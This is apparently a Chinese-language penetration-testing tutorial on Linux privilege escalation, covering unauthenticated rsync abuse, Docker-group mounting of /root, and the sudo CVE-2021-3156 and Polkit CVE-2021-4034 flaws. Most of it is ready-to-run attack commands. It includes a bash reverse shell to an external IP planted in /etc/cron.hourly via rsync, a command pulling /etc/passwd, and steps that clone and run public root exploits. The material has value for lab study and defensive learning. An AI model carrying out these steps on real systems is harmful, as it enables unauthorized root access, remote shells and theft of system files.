【权限提升】Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE

Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE

• Rsync（未授权访问）
• Docker组挂载
• SUDO(CVE-2021-3156）版本漏洞
• Polkit(CVE-2021-4034)

Rsync（未授权访问）

Rsync是linux下一款数据备份工具，默认开启873端口 https://vulhub.org/#/environments/rsync/common/ 借助Linux默认计划任务调用/etc/cron.hourly，利用rsync连接覆盖 前提：没有账号密码验证 开放873端口

-提权过程：

1. 创建一个nc文件，内容 #!/bin/bash /bin/bash -i >& /dev/tcp/47.94.236.117/3333 0>&i
2. 赋予执行权限： chmod +x nc
3. 上传文件覆盖定时任务目录下 rsync -av nc rsync://47.94.236.117:873/src/etc/cron.hourly
4. 下载文件 rsync -av rsync://47.94.236.117:873/src/etc/passwd ./
5. 进行nc 监听相应的端口 nc -lvnp 3333

Docker组挂载

条件：普通用户在docker组，利用docker服务启动镜像挂载目录 从而来访问root目录、etc目录等敏感文件来进行权限提升。

-复现：创建用户归类目录，添加到docker组

useradd -d /home/test -m  test
passwd test
usermod -G docker test
newgrp docker

-利用：

docker run -v /root:/mnt -it alpine

在这里插入图片描述

主要的作用是：从Docker上面下载alpine镜像，然后运行; -v将容器外部的目录/root(其他目录也可以) 挂载到容器内部/mnt，使用-it参数进入容器shell。

补充：拿到普通用户权限后，并且该用户在docker中，意思就是可以控制docker服务 管理员将真实物理机/root目录挂载到容器内部/mnt中，-it参数进入容器shell，

SUDO(CVE-2021-3156）版本漏洞

-判断： sudo: 1.8.2 - 1.8.31p2 sudo: 1.9.0 - 1.9.5p1 sudoedit -s / 报错 则存在

在这里插入图片描述

未报错，漏洞不存在：

在这里插入图片描述

-利用：普通本地用户权限

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
chmod a+x sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich 1

Polkit(CVE-2021-4034)

漏洞影响2009年5月至今的所有polkit版本 由于polkit是系统预装工具，所有存在polkit的linux系统均受影响 如：CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等 -判断：dpkg -l policykit-1

在这里插入图片描述

-利用：

git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034/
make
./cve-2021-4034